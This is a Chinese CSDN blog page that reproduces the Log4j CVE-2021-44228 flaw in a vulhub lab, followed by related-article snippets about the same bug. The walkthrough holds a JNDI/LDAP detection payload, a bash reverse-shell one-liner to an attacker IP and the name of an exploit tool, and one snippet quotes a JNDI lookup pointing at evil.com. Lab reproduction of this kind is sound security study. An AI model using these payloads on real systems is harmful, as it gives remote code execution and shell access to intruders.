Log4j(CVE-2021-44228)

最新推荐文章于 2024-06-16 22:31:06 发布
最新推荐文章于 2024-06-16 22:31:06 发布
阅读量97 收藏
点赞数
文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ljj20020718/article/details/131676006
版权

log4j原理:log4j漏洞成因和原理(JNDI和LDAP)_Koikoi123的博客-CSDN博客

漏洞复现:

进入到vulhub里的指定漏洞库,打开环境:docker-compose up -d

访问该漏洞环境,使用dnslog平台检测是否存在log4j漏洞,payload:${jndi:ldap://${sys:java.version}.009nuz.dnslog.cn},返回dnslog检测平台,发现成功回显,说明存在log4j漏洞

使用POC: bash -i >& /dev/tcp/192.168.211.130/6666 0>&1,然后对该POC进行base64编码,使用漏洞利用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar(工具要在kali中使用,windows中使用无效)

Kali开启监听

选择工具生成的一个exp进行利用,访问后成功反弹shell

JayJay_Lin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Log4j CVE-2021-44228 漏洞及Spring Boot解决方案
oscar999的专栏
12-17 2035
Log4j 的2 到 2.14 版本最近爆出了一个比较大的漏洞,漏洞编号是CVE-2021-44228。本篇对该漏洞进行简单介绍, 并介绍Spring Boot项目如何解决该漏洞。
Log4j CVE-2021-44228后续-CVE-2021-45046,CVE-2021-45105
oscar999的专栏
12-20 1113
Log4j 发现远程代码攻击漏洞(CVE-2021-44228 )之后, Apache 随即发布了 2.15.0版本, 但是发布的这个版本在线程上下文查找依旧存在远程代码攻击漏洞(CVE-2021-45046),于是随后又发布了 2.16.0版本; 不幸的是,两天后,Log4j 又被发现了DOS(拒绝服务)的漏洞(CVE-2021-45105), 于是又发布了2.17.0 版本, 截止目前位置, Log4j 在Java 8的**安全版本是2.17.0 **。
log4j CVE-2021-44228 RCE漏洞复现
wutiangui的博客
11-07 1026
Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。访问http://192.168.232.131:8983/即可查看到Apache Solr的后台页面。这里echo后面就是你加密之后的值,最后面的IP还是攻击机的IP,回车启动。1.准备payload。
CVE-2021-44228:Apache Log4j RCE
Fly_鹏程万里
12-18 1397
文章前言 本篇文章我们主要介绍关于CVE-2021-44228:Apache Log4j RCE漏洞的自检与修复,帮助甲方人员尽快修复项目中存在的不安全依赖 漏洞概述 Apache Log4j2是⼀个基于Java的⽇志记录⼯具,该⼯具重写了Log4j框架,并且引⼊了⼤量丰富的特性,该⽇志框架被⼤量⽤于业务系统开发,⽤来记录⽇志信息,⼤多数情况下,开发者可能会将⽤户输⼊导致的错误信息写⼊⽇志中,由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执⾏漏洞。该漏洞
log4j-CVE-2021-44228-vulhub复现
crowsec
12-20 4942
微信公众号:乌鸦安全 扫取二维码获取更多信息! 01漏洞描述 Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。 参考地址: https://github.com/vulhub/vulhub 本次漏洞复现也是基于Vulhub 02漏洞环...
【vulhub】Log4j2:CVE-2021-44228漏洞复现
weixin_49422491的博客
09-13 2643
【vulhub】Log4j2:CVE-2021-44228漏洞复现
log4j 漏洞CVE-2021-44228 漏洞复现
kyliuw的博客
03-08 5988
log4j 漏洞CVE-2021-44228 漏洞复现
ElasticSearch6.8.13解决Log4j CVE-2021-44228漏洞
qq_40864421的博客
12-14 5509
ElasticSearch6.8.13解决Log4j CVE-2021-44228漏洞
Log4j2漏洞复现(CVE-2021-44228
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
Log4j漏洞CVE-2021-44228原理以及漏洞复现【vulhub】
m0_55854679的博客
08-17 745
文章目录 漏洞概述 关于JNDI 关于RMI 影响版本 漏洞检测 漏洞复现 漏洞预防
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Java 6 将 log4j 升级到 2.3.2 版本,Java 7 将 log4j 升级到 2.12.4 版本,Java 8 或更高版本将 log4j 升级到 2.17.1 版本
CVE-2021-44228复现工具及流程文档.zip
12-10
需要本地java环境,演示采用的IDEA,压缩包内提供了marshalsec-0.0.3-SNAPSHOT-all.jar
Log4j-2.15.0-rc2.zip
12-10
Apache Log4j2 远程代码执行漏洞(CVE-2021-44228) 包含log4j-slf4j-impl-2.15.0.jar、log4j-1.2-api-2.15.0.jar、log4j-core-2.15.0.jar、log4j-web-2.15.0.jar、log4j-api-2.15.0.jar
python单元测试
最新发布
FeeLing
06-16 245
用来验证一小段代码的正确性可以快速执行在独立的环境中执行。
使用 Python 进行测试(6)Fake it...
一只大鸽子的博客
06-16 515
使用Mock模拟函数/类。
【Java】解决Java报错:IllegalArgumentException
Easonmax的博客
06-07 1017
在某些情况下,使用自定义异常可以提供更有意义的错误信息和处理逻辑。System.out.println("捕获到自定义异常: " + e.getMessage());throw new InvalidAgeException("年龄必须在0到150之间");System.out.println("年龄设置为: " + age);理解并有效处理对于编写健壮的Java程序至关重要。
动态 SQL
weixin_43497876的博客
06-13 195
例如在有一些网站进行注册的时候,会要求必须输入邮箱、密码,而那些年龄性别什么的则并不是必填项。假设现在有种情况:全部数据都是非必传的,其中有一个数据传过来了,但是后面没数据就会导致 SQL 语句中多出来了一个 , 逗号就会导致报错。也就是说执行的 SQL 语句并不是固定的,而是不同人的不同操作执行的语句会有所差异。用在 update 修改操作里面的,跟 的使用一样,如果不传的话就不会生成,绑定⽅法参数中的集合,即表示需要 foreach 的是谁。遍历时的每⼀个对象,每次循环的是什么。
apache log4j CVE-2021-44228漏洞怎么解决
06-03
java -Dlog4j2.formatMsgNoLookups=true -Dlog4j2.disable.jmx=true -Dlog4j2.benchMillis=100 org.apache.logging.log4j.core.tools.GenerateExtendedLoggerInfo > log4j2-enum-class-loader.policy ``` 然后将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值